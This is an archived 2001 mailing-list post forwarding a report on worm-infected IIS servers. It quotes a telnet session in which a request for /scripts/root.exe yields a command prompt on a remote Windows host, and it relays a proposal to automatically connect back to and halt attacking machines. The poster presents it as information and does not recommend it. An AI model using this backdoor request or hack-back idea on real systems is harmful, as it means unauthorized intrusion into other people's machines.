[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

FW: Careful. This is for information only.

I don't recommend doing this, but here is a forwarded message

------------ Forwarded Message
According to incidents.org, for any machine that hits your webserver
XXXXX, you can telnet back to that machine on port 80 and get cmd line
access to that machine:

>> I tried telneting back to a server that had sent the
>> Results:
>> -----------------------------------------------------
>> GET /scripts/root.exe HTTP/1.0
>> HTTP/1.1 200 OK
>> Server: Microsoft-IIS/5.0
>> Date: Sat, 04 Aug 2001 20:35:19 GMT
>> Content-Type: application/octet-stream
>> Microsoft Windows 2000 [Version 5.00.2195]
>> (C) Copyright 1985-1999 Microsoft Corp.
>> c:\inetpub\scripts>
>> -----------------------------------------------------

Amazing!  Someone on /. proposed writing a script that whenever anyone
your web server with XXXX, you automatically connect back and halt the
attacking machine, thus stopping the spread.


Reply to: